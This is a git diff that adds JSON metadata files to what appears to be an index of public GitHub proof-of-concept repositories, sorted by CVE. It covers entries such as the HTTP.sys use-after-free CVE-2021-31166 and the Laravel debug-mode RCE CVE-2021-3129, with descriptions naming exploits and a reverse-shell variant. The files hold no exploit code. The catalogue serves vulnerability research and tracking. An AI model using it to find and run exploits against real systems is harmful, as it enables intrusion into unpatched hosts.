+ "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 48, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 470172833, + "name": "desc_race", + "full_name": "Dylbin\/desc_race", + "owner": { + "login": "Dylbin", + "id": 94767639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94767639?v=4", + "html_url": "https:\/\/github.com\/Dylbin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dylbin\/desc_race", + "description": "desc_race exploit for iOS 15.0 - 15.1.1 (with stable kernel r\/w primitives) (CVE-2021-30955) ", + "fork": false, + "created_at": "2022-03-15T13:30:38Z", + "updated_at": "2024-05-27T20:46:33Z", + "pushed_at": "2022-04-15T21:22:07Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 471360094, + "name": "Pentagram-exploit-tester", + "full_name": "GeoSn0w\/Pentagram-exploit-tester", + "owner": { + "login": "GeoSn0w", + "id": 15067741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15067741?v=4", + "html_url": "https:\/\/github.com\/GeoSn0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GeoSn0w\/Pentagram-exploit-tester", + "description": "A test app to check if your device is vulnerable to CVE-2021-30955", + "fork": false, + "created_at": "2022-03-18T12:32:10Z", + "updated_at": "2024-11-07T01:11:53Z", + "pushed_at": "2023-10-12T14:45:58Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "hacktoberfest", + "ios" + ], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30956.json b/2021/CVE-2021-30956.json new file mode 100644 index 0000000000..52b5148993 --- /dev/null +++ b/2021/CVE-2021-30956.json @@ -0,0 +1,33 @@ +[ + { + "id": 498628601, + "name": "CVE-2021-30956", + "full_name": "fordsham\/CVE-2021-30956", + "owner": { + "login": "fordsham", + "id": 78381983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78381983?v=4", + "html_url": "https:\/\/github.com\/fordsham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fordsham\/CVE-2021-30956", + "description": "Phone number notification bug", + "fork": false, + "created_at": "2022-06-01T07:09:18Z", + "updated_at": "2022-06-01T07:09:18Z", + "pushed_at": "2022-06-01T08:09:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31159.json b/2021/CVE-2021-31159.json new file mode 100644 index 0000000000..3ca99b312f --- /dev/null +++ b/2021/CVE-2021-31159.json @@ -0,0 +1,37 @@ +[ + { + "id": 349519809, + "name": "CVE-2021-31159", + "full_name": "ricardojoserf\/CVE-2021-31159", + "owner": { + "login": "ricardojoserf", + "id": 11477353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11477353?v=4", + "html_url": "https:\/\/github.com\/ricardojoserf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ricardojoserf\/CVE-2021-31159", + "description": "Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159) - https:\/\/ricardojoserf.github.io\/CVE-2021-31159\/", + "fork": false, + "created_at": "2021-03-19T18:28:43Z", + "updated_at": "2024-08-12T20:11:21Z", + "pushed_at": "2021-06-16T16:21:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "manageengine-servicedesk", + "servicedeskplus" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31166.json b/2021/CVE-2021-31166.json new file mode 100644 index 0000000000..b7fbebe87f --- /dev/null +++ b/2021/CVE-2021-31166.json @@ -0,0 +1,382 @@ +[ + { + "id": 367930039, + "name": "CVE-2021-31166", + "full_name": "0vercl0k\/CVE-2021-31166", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-31166", + "description": "Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.", + "fork": false, + "created_at": "2021-05-16T16:15:56Z", + "updated_at": "2024-11-23T01:41:18Z", + "pushed_at": "2021-06-12T08:27:09Z", + "stargazers_count": 820, + "watchers_count": 820, + "has_discussions": false, + "forks_count": 139, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "accept-encoding", + "cve-2021-31166", + "http", + "ulpparsecontentcoding" + ], + "visibility": "public", + "forks": 139, + "watchers": 820, + "score": 0, + "subscribers_count": 23 + }, + { + "id": 368156601, + "name": "CVE-2021-31166", + "full_name": "zha0gongz1\/CVE-2021-31166", + "owner": { + "login": "zha0gongz1", + "id": 41460798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41460798?v=4", + "html_url": "https:\/\/github.com\/zha0gongz1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zha0gongz1\/CVE-2021-31166", + "description": "PoC for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely. Although it was defined as remote command execution, it can only cause the system to crash.", + "fork": false, + "created_at": "2021-05-17T11:12:45Z", + "updated_at": "2024-08-12T20:13:05Z", + "pushed_at": "2021-05-17T11:30:26Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "accept-encoding", + "cve-2021-31166", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 368306577, + "name": "CVE-2021-31166-detection-rules", + "full_name": "mvlnetdev\/CVE-2021-31166-detection-rules", + "owner": { + "login": "mvlnetdev", + "id": 41307333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41307333?v=4", + "html_url": "https:\/\/github.com\/mvlnetdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mvlnetdev\/CVE-2021-31166-detection-rules", + "description": "Different rules to detect if CVE-2021-31166 is being exploited", + "fork": false, + "created_at": "2021-05-17T19:55:41Z", + "updated_at": "2022-07-21T02:50:56Z", + "pushed_at": "2022-02-26T12:52:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 368350830, + "name": "CVE-2021-31166", + "full_name": "corelight\/CVE-2021-31166", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2021-31166", + "description": "HTTP Protocol Stack CVE-2021-31166", + "fork": false, + "created_at": "2021-05-17T23:54:12Z", + "updated_at": "2024-10-18T12:05:37Z", + "pushed_at": "2024-10-17T04:45:50Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 368786720, + "name": "CVE-2021-31166", + "full_name": "zecopro\/CVE-2021-31166", + "owner": { + "login": "zecopro", + "id": 23106986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23106986?v=4", + "html_url": "https:\/\/github.com\/zecopro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zecopro\/CVE-2021-31166", + "description": "simple bash script for exploit CVE-2021-31166", + "fork": false, + "created_at": "2021-05-19T07:50:40Z", + "updated_at": "2023-10-11T14:36:15Z", + "pushed_at": "2021-05-19T08:18:56Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 370131263, + "name": "WIn-CVE-2021-31166", + "full_name": "bgsilvait\/WIn-CVE-2021-31166", + "owner": { + "login": "bgsilvait", + "id": 38823062, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38823062?v=4", + "html_url": "https:\/\/github.com\/bgsilvait", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bgsilvait\/WIn-CVE-2021-31166", + "description": null, + "fork": false, + "created_at": "2021-05-23T18:41:48Z", + "updated_at": "2021-05-23T19:32:43Z", + "pushed_at": "2021-05-23T19:32:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 382641118, + "name": "CVE-2021-31166-Exploit", + "full_name": "y0g3sh-99\/CVE-2021-31166-Exploit", + "owner": { + "login": "y0g3sh-99", + "id": 59962466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59962466?v=4", + "html_url": "https:\/\/github.com\/y0g3sh-99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y0g3sh-99\/CVE-2021-31166-Exploit", + "description": "Exploit for MS Http Protocol Stack RCE vulnerability (CVE-2021-31166)", + "fork": false, + "created_at": "2021-07-03T14:54:59Z", + "updated_at": "2022-01-18T13:29:37Z", + "pushed_at": "2021-07-03T15:27:28Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "accept-encoding", + "cve-2021-31166", + "dos", + "exploit", + "http", + "kernel", + "python3", + "rce", + "request-header", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410758909, + "name": "CVE-2021-31166", + "full_name": "ZZ-SOCMAP\/CVE-2021-31166", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2021-31166", + "description": "Windows HTTP协议栈远程代码执行漏洞 CVE-2021-31166", + "fork": false, + "created_at": "2021-09-27T05:56:45Z", + "updated_at": "2024-09-19T01:56:46Z", + "pushed_at": "2021-11-04T02:23:11Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 419230261, + "name": "CVE-2021-31166-exploit", + "full_name": "imikoYa\/CVE-2021-31166-exploit", + "owner": { + "login": "imikoYa", + "id": 92157170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92157170?v=4", + "html_url": "https:\/\/github.com\/imikoYa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imikoYa\/CVE-2021-31166-exploit", + "description": "Just a simple CVE-2021-31166 exploit tool", + "fork": false, + "created_at": "2021-10-20T07:37:46Z", + "updated_at": "2023-08-24T06:19:05Z", + "pushed_at": "2021-10-20T07:50:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467221883, + "name": "CVE-2021-31166", + "full_name": "mauricelambert\/CVE-2021-31166", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-31166", + "description": "CVE-2021-31166: exploitation with Powershell, Python, Ruby, NMAP and Metasploit.", + "fork": false, + "created_at": "2022-03-07T18:56:52Z", + "updated_at": "2023-04-23T11:13:47Z", + "pushed_at": "2022-03-16T21:21:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluescreen", + "crash", + "cve", + "cve-2021-31166", + "denial-of-service", + "dos", + "exploit", + "iis", + "metasploit", + "microsoft", + "nmap", + "payload", + "powershell", + "python3", + "ruby", + "vulnerability", + "webserver" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 569183785, + "name": "Home-Demolisher", + "full_name": "0xmaximus\/Home-Demolisher", + "owner": { + "login": "0xmaximus", + "id": 63053441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63053441?v=4", + "html_url": "https:\/\/github.com\/0xmaximus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmaximus\/Home-Demolisher", + "description": "PoC for CVE-2021-31166 and CVE-2022-21907", + "fork": false, + "created_at": "2022-11-22T09:10:36Z", + "updated_at": "2024-10-03T05:16:45Z", + "pushed_at": "2022-12-08T11:05:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31184.json b/2021/CVE-2021-31184.json new file mode 100644 index 0000000000..9755f38e9a --- /dev/null +++ b/2021/CVE-2021-31184.json @@ -0,0 +1,33 @@ +[ + { + "id": 366469517, + "name": "CVE-2021-31184", + "full_name": "waleedassar\/CVE-2021-31184", + "owner": { + "login": "waleedassar", + "id": 5983995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4", + "html_url": "https:\/\/github.com\/waleedassar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-31184", + "description": null, + "fork": false, + "created_at": "2021-05-11T17:52:22Z", + "updated_at": "2024-08-12T20:12:54Z", + "pushed_at": "2021-05-11T17:57:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3122.json b/2021/CVE-2021-3122.json new file mode 100644 index 0000000000..e25067f077 --- /dev/null +++ b/2021/CVE-2021-3122.json @@ -0,0 +1,33 @@ +[ + { + "id": 336828311, + "name": "CVE-2021-3122-Details", + "full_name": "acquiredsecurity\/CVE-2021-3122-Details", + "owner": { + "login": "acquiredsecurity", + "id": 30843972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30843972?v=4", + "html_url": "https:\/\/github.com\/acquiredsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acquiredsecurity\/CVE-2021-3122-Details", + "description": null, + "fork": false, + "created_at": "2021-02-07T16:05:49Z", + "updated_at": "2024-08-12T20:10:10Z", + "pushed_at": "2022-11-01T13:52:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-31233.json b/2021/CVE-2021-31233.json new file mode 100644 index 0000000000..218304b427 --- /dev/null +++ b/2021/CVE-2021-31233.json @@ -0,0 +1,33 @@ +[ + { + "id": 646876751, + "name": "CVE-2021-31233", + "full_name": "gabesolomon\/CVE-2021-31233", + "owner": { + "login": "gabesolomon", + "id": 106892722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106892722?v=4", + "html_url": "https:\/\/github.com\/gabesolomon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gabesolomon\/CVE-2021-31233", + "description": "SQL Injection vulnerability found in Fighting Cock Information System v1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter", + "fork": false, + "created_at": "2023-05-29T14:38:58Z", + "updated_at": "2023-11-04T17:00:33Z", + "pushed_at": "2023-05-29T15:21:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3129.json b/2021/CVE-2021-3129.json new file mode 100644 index 0000000000..b9d4017d5a --- /dev/null +++ b/2021/CVE-2021-3129.json @@ -0,0 +1,926 @@ +[ + { + "id": 329307363, + "name": "laravel-exploits", + "full_name": "ambionics\/laravel-exploits", + "owner": { + "login": "ambionics", + "id": 29630660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4", + "html_url": "https:\/\/github.com\/ambionics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ambionics\/laravel-exploits", + "description": "Exploit for CVE-2021-3129", + "fork": false, + "created_at": "2021-01-13T12:52:20Z", + "updated_at": "2024-11-06T11:55:21Z", + "pushed_at": "2021-01-29T13:59:07Z", + "stargazers_count": 264, + "watchers_count": 264, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 264, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 331843308, + "name": "CVE-2021-3129", + "full_name": "SNCKER\/CVE-2021-3129", + "owner": { + "login": "SNCKER", + "id": 49559334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49559334?v=4", + "html_url": "https:\/\/github.com\/SNCKER", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SNCKER\/CVE-2021-3129", + "description": "Laravel debug rce", + "fork": false, + "created_at": "2021-01-22T05:12:21Z", + "updated_at": "2024-11-17T07:18:34Z", + "pushed_at": "2021-01-24T05:28:07Z", + "stargazers_count": 125, + "watchers_count": 125, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 49, + "watchers": 125, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 332682252, + "name": "laravel-CVE-2021-3129-EXP", + "full_name": "SecPros-Team\/laravel-CVE-2021-3129-EXP", + "owner": { + "login": "SecPros-Team", + "id": 77960183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77960183?v=4", + "html_url": "https:\/\/github.com\/SecPros-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecPros-Team\/laravel-CVE-2021-3129-EXP", + "description": null, + "fork": false, + "created_at": "2021-01-25T08:42:28Z", + "updated_at": "2024-10-21T16:34:50Z", + "pushed_at": "2021-01-25T08:49:59Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 71, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 333316985, + "name": "Laravel_CVE-2021-3129_EXP", + "full_name": "crisprss\/Laravel_CVE-2021-3129_EXP", + "owner": { + "login": "crisprss", + "id": 55953931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55953931?v=4", + "html_url": "https:\/\/github.com\/crisprss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crisprss\/Laravel_CVE-2021-3129_EXP", + "description": null, + "fork": false, + "created_at": "2021-01-27T05:44:52Z", + "updated_at": "2024-08-12T20:09:47Z", + "pushed_at": "2021-01-27T06:23:34Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 333380316, + "name": "CVE-2021-3129_exploit", + "full_name": "nth347\/CVE-2021-3129_exploit", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2021-3129_exploit", + "description": "Exploit for CVE-2021-3129", + "fork": false, + "created_at": "2021-01-27T10:16:35Z", + "updated_at": "2024-10-29T05:00:59Z", + "pushed_at": "2021-03-07T04:39:58Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "laravel", + "security" + ], + "visibility": "public", + "forks": 26, + "watchers": 65, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 338768882, + "name": "Laravel-8.4.2-rce-CVE-2021-3129", + "full_name": "FunPhishing\/Laravel-8.4.2-rce-CVE-2021-3129", + "owner": { + "login": "FunPhishing", + "id": 77312720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77312720?v=4", + "html_url": "https:\/\/github.com\/FunPhishing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FunPhishing\/Laravel-8.4.2-rce-CVE-2021-3129", + "description": null, + "fork": false, + "created_at": "2021-02-14T09:24:07Z", + "updated_at": "2024-08-12T20:10:22Z", + "pushed_at": "2021-02-14T12:27:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 339947921, + "name": "CVE-2021-3129", + "full_name": "zhzyker\/CVE-2021-3129", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2021-3129", + "description": "Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)", + "fork": false, + "created_at": "2021-02-18T05:42:13Z", + "updated_at": "2024-11-23T08:57:08Z", + "pushed_at": "2021-12-14T05:12:17Z", + "stargazers_count": 148, + "watchers_count": 148, + "has_discussions": false, + "forks_count": 58, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 58, + "watchers": 148, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 356778327, + "name": "CVE-2021-3129", + "full_name": "Y0s9\/CVE-2021-3129", + "owner": { + "login": "Y0s9", + "id": 47767103, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47767103?v=4", + "html_url": "https:\/\/github.com\/Y0s9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y0s9\/CVE-2021-3129", + "description": "CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞", + "fork": false, + "created_at": "2021-04-11T05:47:43Z", + "updated_at": "2021-04-11T05:47:44Z", + "pushed_at": "2021-02-21T06:34:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 388370396, + "name": "laravel-CVE-2021-3129-EXP", + "full_name": "idea-oss\/laravel-CVE-2021-3129-EXP", + "owner": { + "login": "idea-oss", + "id": 79071420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79071420?v=4", + "html_url": "https:\/\/github.com\/idea-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/idea-oss\/laravel-CVE-2021-3129-EXP", + "description": null, + "fork": false, + "created_at": "2021-07-22T07:35:04Z", + "updated_at": "2024-08-12T20:14:53Z", + "pushed_at": "2021-07-22T09:18:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 412400011, + "name": "CVE-2021-3129", + "full_name": "knqyf263\/CVE-2021-3129", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2021-3129", + "description": "PoC for CVE-2021-3129 (Laravel)", + "fork": false, + "created_at": "2021-10-01T09:09:38Z", + "updated_at": "2024-08-12T20:16:51Z", + "pushed_at": "2021-10-09T09:37:05Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 479273150, + "name": "CVE-2021-3129-Script", + "full_name": "cuongtop4598\/CVE-2021-3129-Script", + "owner": { + "login": "cuongtop4598", + "id": 52173058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52173058?v=4", + "html_url": "https:\/\/github.com\/cuongtop4598", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cuongtop4598\/CVE-2021-3129-Script", + "description": "Add revert shell ", + "fork": false, + "created_at": "2022-04-08T06:34:17Z", + "updated_at": "2023-09-09T04:21:08Z", + "pushed_at": "2022-04-08T06:59:38Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482317429, + "name": "CVE-2021-3129", + "full_name": "joshuavanderpoll\/CVE-2021-3129", + "owner": { + "login": "joshuavanderpoll", + "id": 16516497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16516497?v=4", + "html_url": "https:\/\/github.com\/joshuavanderpoll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joshuavanderpoll\/CVE-2021-3129", + "description": "Laravel RCE Exploit Script - CVE-2021-3129", + "fork": false, + "created_at": "2022-04-16T17:22:55Z", + "updated_at": "2024-11-22T09:53:32Z", + "pushed_at": "2024-09-22T13:10:27Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-3129", + "exploit", + "exploits", + "laravel", + "pentest-tool", + "pentesting", + "python", + "rce", + "scanner", + "security", + "security-tools", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 20, + "watchers": 93, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499800049, + "name": "Laravel-CVE-2021-3129", + "full_name": "shadowabi\/Laravel-CVE-2021-3129", + "owner": { + "login": "shadowabi", + "id": 50265741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50265741?v=4", + "html_url": "https:\/\/github.com\/shadowabi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shadowabi\/Laravel-CVE-2021-3129", + "description": "CVE-2021-3129 POC", + "fork": false, + "created_at": "2022-06-04T10:58:47Z", + "updated_at": "2023-04-21T05:37:04Z", + "pushed_at": "2022-09-29T04:02:11Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 532298573, + "name": "CVE-2021-3129", + "full_name": "JacobEbben\/CVE-2021-3129", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2021-3129", + "description": "Unauthenticated RCE in Laravel Debug Mode 